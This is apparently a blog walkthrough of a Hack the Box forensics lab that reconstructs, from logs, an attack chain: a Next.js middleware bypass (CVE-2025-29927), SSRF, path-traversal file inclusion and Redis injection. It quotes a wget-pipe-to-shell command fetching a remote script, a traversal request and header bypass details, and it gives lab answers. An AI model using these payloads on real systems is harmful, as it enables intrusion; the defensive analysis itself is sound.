NeuroSync-D - Hack the Box Lab

BlueDolphin
Apr 12
5 min read

What Makes This Attack Clever

It chains multiple vulnerabilities:
- | CVE-2025-29927 (auth bypass in Next.js)
  | SSRF to scan and find internal services
  | LFI to steal secrets
  | Redis injection for command execution

High-Level Summary

The attacker initially exploits a authorization bypass vuln in Next.js, a web application framework (CVE-2025-29927). From here the attacker performs a SSRF (Server-Side Request Forgery) later followed by a Local File Inclusion (LFI) vulnerability to gain access to sensitive files (secrets.txt). Finally, the attack uses these stolen secrets to inject commands into Redis to achieve Remote Code Execution on a BCI device.

Attackers Actions vs System Responses

Step-by-Step Attack Breakdown

1. Initial Recon and Enumeration

Attacker started by probing for typical static files in a Next.js app.
Found /main-app.js at /_next/static/chunks/main-app.js with a 200 status, confirming the app is using Next.js.
Discovered the Next.js version is 15.1.0 from interface.log.

2. Identifying Vulnerable Endpoint

The attacker made multiple requests to /api/bci/analytics, which returned 401 Unauthorized.
This indicated it was protected by authentication via middleware — a key clue.

3. Exploitation of CVE-2025-29927 (Authorization Bypass)

The attacker tried to bypass the middleware by sending a custom header:x-middleware-subrequest: middleware
After multiple attempts with increasing middleware: the 5th attempt returned a 200 OK.

4. SSRF and Internal Port Discovery

With middleware bypassed, the attacker abused the app’s SSRF capability to scan internal services.
Found an internal API running on port 4000 (seen in data-api.log).

5. Brute Forcing API Endpoints

Attacker tried various paths on the port 4000 API.
Found:
- /analytics – not directly vulnerable.
- /logs – vulnerable to LFI via a logFile parameter.

6. Local File Inclusion (LFI)

Accessed system files like /etc/passwd and eventually /tmp/secret.key.

7. Redis Injection & RCE

Using the contents of /tmp/secret.key, the attacker injected a Redis command to execute OS commands.
When decoded (Base64), the command is:
wget http://185.202.2.147/h4Pln4/run.sh -O- | sh
This downloads and executes a shell script, giving them remote control over the device.

Resources:

CVE-2025-29927
- https://github.com/lirantal/vulnerable-nextjs-14-CVE-2025-29927
POC CVE-2025-29927
- https://github.com/azu/nextjs-cve-2025-29927-poc
Analysis by a vulnerability researcher
- https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware

Forensic Evidence

interface.log
1. Logs related to UI interactions and API interfaces
  1. Requests/responses between front and back end will be stored here
  2. If a request is handled by the middleware, it will be logged here.
access.log
1. Standard web server access logs
  1. Ip address, time stamps, url requests and response codes
bci-device.log
1. A brain computer interface hardware component
  1. Communications between the system and the BCI hardware.
data-api.log
1. Logs related to the backend API
  1. Incoming API requests, database queries and auth attempts
redis.log
1. Logs generated by the Redis server
  1. Connection attempts, startup messages, memory usage and errors.

Walkthrough

What version of Next.js is the application using?

Interface.log - Reveals information related to the API including the version of the server side web application being used which we can see is Next.js 15.1.0.

> neurosync@0.1.0 dev

> next dev

   ▲ Next.js 15.1.0

   - Local:        http://localhost:3000

   - Network:      http://172.17.0.2:3000

   - Experiments (use with caution):

     · webpackBuildWorker

     · parallelServerCompiles

     · parallelServerBuildTraces

What local port is the Next.js-based application running on?

Interface.log - Reveals this information in the header which we viewed on the previous question just above, where the application is running on port 3000.

A critical Next.js vulnerability was released in March 2025, and this version appears to be affected. What is the CVE identifier for this vulnerability?

Looking up CVE's by version, results in CVE-2025-29927.

The attacker tried to enumerate some static files that are typically available in the Next.js framework, most likely to retrieve its version. What is the first file he could get?

Access.log - Provides us with web requests and the corresponding responses. The request to the /main-apps.js endpoint returns 200.

Then the attacker appears to have found an endpoint that is potentially affected by the previously identified vulnerability. What is that endpoint?

Interface.log - Shows the malicious request followed by rapid api calls to /api/bci/analytics.

How many requests to this endpoint have resulted in an "Unauthorized" response?

access.log - shows 5 unauthorized responses from the server before a successful response of 200.

When is a successful response received from the vulnerable endpoint, meaning that the middleware has been bypassed?

Interface.log - reveals the payload development which is explained in the article covering CVE-2025-29927 found in the reference section at the start of this blog, in which the request is repeatedly appended with the middleware string until the server responds 200 success. However in interface.log we can only see the inbound requests and not the servers response.

While we see the last request was received at 11:38:04 - we could infer that the final response from the server was successful, so the time stamp would be either the same time stamp as the GET request, or just a second or 2 above.

Given the previous failed requests, what will most likely be the final value for the vulnerable header used to exploit the vulnerability and bypass the middleware?

Interface.log - The question itself uses unique wording in asking for the "Most likely" value for the vulnerable header. Well, when we reviewed the POC CVE the payload actually contained 5 instances of the middleware string, however it seems our interface.log file shows the last payload before the attacker succeeded as only having 4 instances of middleware strings in the header.

This is because, the payload succeeded in bypassing the middleware on the 5th iteration, so therefore the middleware did not handle the request and did not create a log item.

The attacker chained the vulnerability with an SSRF attack, which allowed them to perform an internal port scan and discover an internal API. On which port is the API accessible?

data-api.log - Reveals the incoming request to the endpoint over port 4000.

After the port scan, the attacker starts a brute-force attack to find some vulnerable endpoints in the previously identified API. Which vulnerable endpoint was found?

data-api.log - Shows repeating requests one after another, however the /logs request triggers a Received message and serves up a file in the that directory.

When the vulnerable endpoint found was used maliciously for the first time?

data-api.log - Looking at the previous findings, the line item where we first see the local file inclusion attempt, is in fact the first exploit attempt.

What is the attack name the endpoint is vulnerable to?

Local File Inclusion.

What is the name of the file that was targeted the last time the vulnerable endpoint was exploited?

data-api.log - shows the last local file inclusion attack being run against secret.key.

2025-04-01 11:39:24 [VERBOSE] Incoming request: GET /logs?logFile=/var/log/../.../...//../.../...//tmp/secret.key from ::ffff:127.0.0.1

Finally, the attacker uses the sensitive information obtained earlier to create a special command that allows them to perform Redis injection and gain RCE on the system. What is the command string?

redis.log - Reveals the encoded string passed through bci_commands.